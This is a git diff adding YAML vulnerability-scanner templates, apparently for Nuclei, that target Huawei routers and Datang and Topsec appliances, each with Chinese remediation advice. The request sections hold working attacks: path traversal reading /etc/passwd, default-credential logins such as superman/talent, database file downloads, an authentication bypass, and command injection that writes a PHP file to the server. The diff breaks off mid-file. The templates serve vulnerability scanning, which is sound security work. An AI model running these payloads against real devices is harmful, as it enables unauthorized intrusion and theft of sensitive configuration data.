"官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:\nhttp://www.huawei.com/cn/psirt/security-notices/2017/huawei-sn-20170911-01-hg255s-cn\n\n临时修复方案:\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。" +requests: +- matchers: + - type: regex + regex: + - root:[x*]:0:0 + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd' + method: GET diff --git "a/config/51pwn/yaml/\345\215\216\344\270\272\350\267\257\347\224\261\345\231\250/huawei-hg659-lfi.yaml" "b/config/51pwn/yaml/\345\215\216\344\270\272\350\267\257\347\224\261\345\231\250/huawei-hg659-lfi.yaml" new file mode 100755 index 000000000..8d34b850f --- /dev/null +++ "b/config/51pwn/yaml/\345\215\216\344\270\272\350\267\257\347\224\261\345\231\250/huawei-hg659-lfi.yaml" @@ -0,0 +1,27 @@ +id: huawei-hg659-lfi +info: + name: HUAWEI HG659 LFI + author: + - l0ne1y + description: |- + HUAWEI HG659 目录穿越漏洞 + HUAWEI HG659 中存在路径遍历漏洞,该漏洞源于程序未能充分的验证接收到的HTTP请求。远程攻击者可利用该漏洞在未经身份验证的情况下访问设备上的本地文件。 + severity: medium + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:\nhttp://www.huawei.com/\n\n临时修复方案:\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。" +requests: +- matchers: + - type: regex + condition: and + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/lib///....//....//....//....//....//....//....//....//etc//passwd' + method: GET diff --git "a/config/51pwn/yaml/\345\244\247\345\224\220\347\224\265\344\277\241AC/CNVD-2021-04128.yaml" "b/config/51pwn/yaml/\345\244\247\345\224\220\347\224\265\344\277\241AC/CNVD-2021-04128.yaml" new file mode 100755 index 000000000..639302c4b --- /dev/null +++ "b/config/51pwn/yaml/\345\244\247\345\224\220\347\224\265\344\277\241AC/CNVD-2021-04128.yaml" @@ -0,0 +1,42 @@ +id: CNVD-2021-04128 +info: + name: Datang AC 默认密码 + author: + - l0ne1y + description: |- + 大唐电信AC集中管理平台存在弱口令漏洞 + 大唐电信科技股份有限公司是电信科学技术研究院(大唐电信科技产业集团)控股的的高科技企业,公司于1998年在北京注册成立,同年10月,“大唐电信”股票在上交所挂牌上市。 + + 大唐电信AC集中管理平台存在弱口令漏洞,攻击者可利用此漏洞获取敏感信息,更改设备配置。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.datang.com/ + + 临时修复方案: + 1、建议系统管理人员将已发现的弱口令立即改成强口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: word + condition: and + part: header + words: + - set-cookie + - ac_userid=admin,ac_passwd= + - type: word + part: body + words: + - window.open('index.htm?_ + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/login.cgi' + method: POST + body: user=admin&password1=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&password=123456&Submit=%E7%AB%8B%E5%8D%B3%E7%99%BB%E5%BD%95 diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241NGFW4000(TG-1509)/NGFW4000-DeafultPass.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241NGFW4000(TG-1509)/NGFW4000-DeafultPass.yaml" new file mode 100755 index 000000000..2d8106f7f --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241NGFW4000(TG-1509)/NGFW4000-DeafultPass.yaml" @@ -0,0 +1,31 @@ +id: NGFW4000-DeafultPass +info: + name: 天融信防火墙NGFW4000(TG-1509)默认弱口令 + author: + - l0ne1y + description: |- + 天融信NGFW4000(TG-1509)弱口令漏洞 + 天融信NGFW4000(TG-1509)是天融信旗下的一款防火墙产品。 + + 天融信NGFW4000(TG-1509)存在弱口令。 + severity: high + remediation: |- + 修复方案: + 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: word + words: + - window.location="maincgi.cgi?Url=Main" + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/cgi/maincgi.cgi?Url=Index' + method: POST + body: username=superman&passwd=talent&loginSubmitIpt=%B5%C7%C2%BC diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-Gateway-FileDownlaod.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-Gateway-FileDownlaod.yaml" new file mode 100755 index 000000000..e6f68fec8 --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-Gateway-FileDownlaod.yaml" @@ -0,0 +1,30 @@ +id: WEB-Gateway-FileDownlaod +info: + name: 天融信WEB应用安全网关任意文件读取 + author: + - l0ne1y + description: |- + 天融信WEB应用安全网关系统任意文件读取漏洞 + 天融信WEB应用安全网关系统是一款针对“网站型”服务器量身定制的产业化产品。 + + 天融信WEB应用安全网关系统存在任意文件读取漏洞,攻击者可利用漏洞读取任意文件内容。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.topsec.com.cn/ + + 临时修复方案: + 1、过滤".",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + dsl: + - status_code==200 && contains(body,"?php") && contains(body,"file_get_contents") + path: + - '{{BaseURL}}/function/content/tamper/file_tamper_show.php?filename=file_tamper_show.php' + method: GET diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-Gateway-InfoLeak.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-Gateway-InfoLeak.yaml" new file mode 100755 index 000000000..38b55b12c --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-Gateway-InfoLeak.yaml" @@ -0,0 +1,29 @@ +id: WEB-Gateway-InfoLeak +info: + name: 天融信WEB应用安全网关 wafconfig.db 文件下载漏洞 + author: + - l0ne1y + description: |- + 天融信WEB应用安全网关系统db文件下载漏洞 + 天融信WEB应用安全网关系统是一款针对“网站型”服务器量身定制的产业化产品。 + + 天融信WEB应用安全网关系统存在db文件下载漏洞,攻击者可通过下载wafconfig.db文件获取系统敏感信息 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.topsec.com.cn/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、禁止外部用户对db文件的访问。 + 4、将敏感信息进行加密存储,非必要不可发送前端。 +requests: +- matchers: + - type: dsl + dsl: + - status_code==200 && contains(body,"tb_system") && contains(body,"SQLite") + path: + - '{{BaseURL}}/db/wafconfig.db' + method: GET diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-audit_db-Downlaod.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-audit_db-Downlaod.yaml" new file mode 100755 index 000000000..f852ae48b --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-audit_db-Downlaod.yaml" @@ -0,0 +1,29 @@ +id: WEB-audit_db-Downlaod +info: + name: 天融信WEB应用安全网关 audit.db 文件下载漏洞 + author: + - l0ne1y + description: |- + 天融信WEB应用安全网关系统db文件下载漏洞 + 天融信WEB应用安全网关系统是一款针对“网站型”服务器量身定制的产业化产品。 + + 天融信WEB应用安全网关系统存在db文件下载漏洞,攻击者可通过下载audit.db文件获取系统敏感信息 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.topsec.com.cn/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、禁止外部用户对db文件的访问。 + 4、将敏感信息进行加密存储,非必要不可发送前端。 +requests: +- matchers: + - type: dsl + dsl: + - status_code==200 && contains(body,"SQLite") + path: + - '{{BaseURL}}/db/audit.db' + method: GET diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-monitor_db-Downlaod.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-monitor_db-Downlaod.yaml" new file mode 100755 index 000000000..de74a680f --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-monitor_db-Downlaod.yaml" @@ -0,0 +1,29 @@ +id: WEB-monitor_db-Downlaod +info: + name: 天融信WEB应用安全网关 monitor.db 文件下载漏洞 + author: + - l0ne1y + description: |- + 天融信WEB应用安全网关系统db文件下载漏洞 + 天融信WEB应用安全网关系统是一款针对“网站型”服务器量身定制的产业化产品。 + + 天融信WEB应用安全网关系统存在db文件下载漏洞,攻击者可通过下载monitor.db文件获取系统敏感信息 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.topsec.com.cn/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、禁止外部用户对db文件的访问。 + 4、将敏感信息进行加密存储,非必要不可发送前端。 +requests: +- matchers: + - type: dsl + dsl: + - status_code==200 && contains(body,"SQLite") + path: + - '{{BaseURL}}/db/monitor.db' + method: GET diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-policy_db-Downlaod.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-policy_db-Downlaod.yaml" new file mode 100755 index 000000000..1962404db --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-policy_db-Downlaod.yaml" @@ -0,0 +1,29 @@ +id: WEB-policy_db-Downlaod +info: + name: 天融信WEB应用安全网关 policy.db 文件下载漏洞 + author: + - l0ne1y + description: |- + 天融信WEB应用安全网关系统db文件下载漏洞 + 天融信WEB应用安全网关系统是一款针对“网站型”服务器量身定制的产业化产品。 + + 天融信WEB应用安全网关系统存在db文件下载漏洞,攻击者可通过下载policy.db文件获取系统敏感信息 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.topsec.com.cn/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、禁止外部用户对db文件的访问。 + 4、将敏感信息进行加密存储,非必要不可发送前端。 +requests: +- matchers: + - type: dsl + dsl: + - status_code==200 && contains(body,"WebPolicy") + path: + - '{{BaseURL}}/db/policy.db' + method: GET diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-product_db-Downlaod.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-product_db-Downlaod.yaml" new file mode 100755 index 000000000..6e93e3e9a --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WEB-product_db-Downlaod.yaml" @@ -0,0 +1,29 @@ +id: WEB-product_db-Downlaod +info: + name: 天融信WEB应用安全网关 product.db 文件下载漏洞 + author: + - l0ne1y + description: |- + 天融信WEB应用安全网关系统db文件下载漏洞 + 天融信WEB应用安全网关系统是一款针对“网站型”服务器量身定制的产业化产品。 + + 天融信WEB应用安全网关系统存在db文件下载漏洞,攻击者可通过下载product.db文件获取系统敏感信息 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.topsec.com.cn/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、禁止外部用户对db文件的访问。 + 4、将敏感信息进行加密存储,非必要不可发送前端。 +requests: +- matchers: + - type: dsl + dsl: + - status_code==200 && contains(body,"SQLite") + path: + - '{{BaseURL}}/db/product.db' + method: GET diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WebGateway-ifcfg_db-Downlaod.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WebGateway-ifcfg_db-Downlaod.yaml" new file mode 100755 index 000000000..8c04b1f6c --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241web\345\272\224\347\224\250\345\256\211\345\205\250\347\275\221\345\205\263\347\263\273\347\273\237/WebGateway-ifcfg_db-Downlaod.yaml" @@ -0,0 +1,29 @@ +id: WebGateway-ifcfg_db-Downlaod +info: + name: 天融信WEB应用安全网关 ifcfg.db 文件下载漏洞 + author: + - l0ne1y + description: |- + 天融信WEB应用安全网关系统db文件下载漏洞 + 天融信WEB应用安全网关系统是一款针对“网站型”服务器量身定制的产业化产品。 + + 天融信WEB应用安全网关系统存在db文件下载漏洞,攻击者可通过下载ifcfg.db文件获取系统敏感信息 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.topsec.com.cn/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、禁止外部用户对db文件的访问。 + 4、将敏感信息进行加密存储,非必要不可发送前端。 +requests: +- matchers: + - type: dsl + dsl: + - status_code==200 && contains(body,"eware2ueth3") + path: + - '{{BaseURL}}/db/ifcfg.db' + method: GET diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD-LoginBypass.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD-LoginBypass.yaml" new file mode 100755 index 000000000..83e5f91ec --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD-LoginBypass.yaml" @@ -0,0 +1,31 @@ +id: TopApp-AD-LoginBypass +info: + name: 天融信TopApp-AD 登录绕过漏洞(系统无需密码直接登陆) + author: + - l0ne1y + description: |- + 天融信TopApp-AD 认证绕过漏洞 + 天融信TopApp-AD应用交付系统是业界功能最全的应用交付设备。 + + 天融信TopApp-AD存在认证绕过漏洞,攻击者可利用该漏洞绕过登录进入系统。 + severity: high + remediation: |2- + + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.topsec.com.cn/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、及时修复该认证绕过漏洞。 +requests: +- matchers: + - type: dsl + dsl: + - ' contains(body,"Main.php") && status_code==200 ' + matchers-condition: and + path: + - '{{BaseURL}}/login_check.php' + method: POST + body: userName={{rand_base(4,"abcdefghjklmn")}}&password=%3Bid&x=38&y=28 diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_bytecache_run_action_php-RCE.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_bytecache_run_action_php-RCE.yaml" new file mode 100755 index 000000000..12f7b28ba --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_bytecache_run_action_php-RCE.yaml" @@ -0,0 +1,33 @@ +id: TopApp-AD_bytecache_run_action_php-RCE +info: + name: 天融信TopApp-AD bytecache_run_action.php 参数engine 命令执行 + author: + - l0ne1y + description: |- + 天融信TopApp-AD bytecache_run_action.php 命令执行漏洞 + 天融信TopApp-AD应用交付系统是业界功能最全的应用交付设备。 + + 天融信TopApp-AD存在命令执行漏洞,攻击者可以利用该漏洞执行任意的系统命令。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.topsec.com.cn/ + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\’”,双引号“””会被转义为“\””,分号“;”会被转义为“\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。 +requests: +- matchers: + - type: dsl + dsl: + - ' contains(body_2,"c4ca4238a0b923820dcc509a6f75849b") && status_code_2==200 ' + matchers-condition: and + path: + - '{{BaseURL}}/acc/debug/bytecache_run_action.php?action=1&engine=%7Cecho%20%22%3C%3Fphp%20echo%20md5%281%29%3Bunlink%28__FILE__%29%3B%3F%3E%22%20%3E{{randstr}}.php%7C&ipfilter=10' + - '{{BaseURL}}/acc/debug/{{randstr}}.php' + method: GET + body: userName={{rand_base(4,"abcdefghjklmn")}}&password=%3Bid&x=38&y=28 diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_change_lan_php-FileRead.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_change_lan_php-FileRead.yaml" new file mode 100755 index 000000000..e02d3f317 --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_change_lan_php-FileRead.yaml" @@ -0,0 +1,30 @@ +id: TopApp-AD_change_lan_php-FileRead +info: + name: 天融信TopApp-AD change_lan.php参数LanID文件读取漏洞 + author: + - l0ne1y + description: |- + 天融信TopApp-AD change_lan.php 任意文件读取漏洞 + 天融信TopApp-AD应用交付系统是业界功能最全的应用交付设备。 + + 天融信TopApp-AD存在任意文件读取漏洞,攻击者可利用漏洞读取任意文件内容。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.topsec.com.cn/ + + 临时修复方案: + 1、过滤".",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + dsl: + - status_code==200 && contains(body,"bin/ash") + path: + - '{{BaseURL}}/change_lan.php?LanID=../../../../../../../../../etc/passwd%00' + method: GET diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_change_lan_php-RCE.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_change_lan_php-RCE.yaml" new file mode 100755 index 000000000..9a46df702 --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_change_lan_php-RCE.yaml" @@ -0,0 +1,35 @@ +id: TopApp-AD_change_lan_php-RCE +info: + name: 天融信TopApp-AD change_lan.php 参数LanID 命令执行 + author: + - l0ne1y + description: |- + 天融信TopApp-AD change_lan.php 命令执行漏洞 + 天融信TopApp-AD应用交付系统是业界功能最全的应用交付设备。 + + 天融信TopApp-AD存在命令执行漏洞,攻击者可以利用该漏洞执行任意的系统命令。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.topsec.com.cn/ + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\’”,双引号“””会被转义为“\””,分号“;”会被转义为“\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。 +requests: +- path: + - '{{BaseURL}}/change_lan.php' + method: POST + body: LanID=1' | echo > {{randstr}}.php | + ' +- matchers: + - type: dsl + dsl: + - status_code==200 && contains(body,"c4ca4238a0b923820dcc509a6f75849b") + path: + - '{{BaseURL}}/{{randstr}}.php' + method: GET diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_download_php-FileDownload.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_download_php-FileDownload.yaml" new file mode 100755 index 000000000..892308f59 --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_download_php-FileDownload.yaml" @@ -0,0 +1,30 @@ +id: TopApp-AD_download_php-FileDownload +info: + name: 天融信TopApp-AD download.php参数f 文件下载漏洞 + author: + - l0ne1y + description: |- + 天融信TopApp-AD download.php 任意文件下载漏洞 + 天融信TopApp-AD应用交付系统是业界功能最全的应用交付设备。 + + 天融信TopApp-AD存在任意文件下载漏洞,攻击者可利用漏洞读取任意文件内容。 + severity: medium + remediation: |- + 官方修复方案: + 